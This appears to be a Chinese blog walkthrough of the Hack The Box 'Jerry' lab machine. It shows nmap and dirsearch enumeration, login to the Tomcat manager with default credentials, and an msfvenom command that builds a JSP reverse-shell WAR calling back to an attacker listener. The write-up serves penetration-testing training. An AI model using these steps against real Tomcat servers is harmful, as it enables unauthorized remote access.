您好,登錄后才能下訂單哦!
本篇內(nèi)容主要講解“HTB的Jerry滲透測(cè)試是什么”,感興趣的朋友不妨來(lái)看看。本文介紹的方法操作簡(jiǎn)單快捷,實(shí)用性強(qiáng)。下面就讓小編來(lái)帶大家學(xué)習(xí)“HTB的Jerry滲透測(cè)試是什么”吧!
簡(jiǎn)介:Hack The Box是一個(gè)在線滲透測(cè)試平臺(tái)??梢詭椭闾嵘凉B透測(cè)試技能和黑盒測(cè)試技能,平臺(tái)環(huán)境都是模擬的真實(shí)環(huán)境,有助于自己更好的適應(yīng)在真實(shí)環(huán)境的滲透
鏈接:https://www.hackthebox.eu/home/machines/profile/144
描述:
本次演練使用kali系統(tǒng)按照滲透測(cè)試的過(guò)程進(jìn)行操作,通過(guò)nmap發(fā)現(xiàn)端口開(kāi)放了tomcat8080端口,使用密碼登錄tomcat,使用msfvenom 生成war文件上傳到tomcat中,通過(guò)反彈獲取shell。
IP地址為:10.10.10.95
nmap -sV -sS -T4 -O -A 10.10.10.95
PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88
查看8080端口
通過(guò)dirsearch進(jìn)行目錄掃描獲取網(wǎng)站目錄
這里我列出了部分需要的目錄
/host-manager/html /manager/html /manager/
進(jìn)入/host-manager/html目錄發(fā)現(xiàn)需要賬號(hào)密碼
點(diǎn)擊取消后,再返回界面發(fā)現(xiàn)賬號(hào)與密碼
username="tomcat"
password="s3cret"
使用該密碼進(jìn)行登錄,返回403頁(yè)面無(wú)法正常進(jìn)行登錄
最后在/manager/目錄下成功登錄
發(fā)現(xiàn)可以上傳war格式文件
使用msfvenom生成shell文件
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell.war
首先設(shè)置好msf,使用msf監(jiān)聽(tīng)4444端口獲取反彈的shell
在登陸頁(yè)面上傳war文件
上傳成功后點(diǎn)擊shell
成功獲取到shell
使用這種方式所獲取的直接是authority權(quán)限可直接查看root.txt
進(jìn)入 \Users\Administrator\Desktop目錄發(fā)現(xiàn)沒(méi)有root.txt但是存在flags
進(jìn)入flags目錄使用type命令查看2 for the price of 1.txt文件
獲取到root.txt與user.txt
到此,相信大家對(duì)“HTB的Jerry滲透測(cè)試是什么”有了更深的了解,不妨來(lái)實(shí)際操作一番吧!這里是億速云網(wǎng)站,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢,關(guān)注我們,繼續(xù)學(xué)習(xí)!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。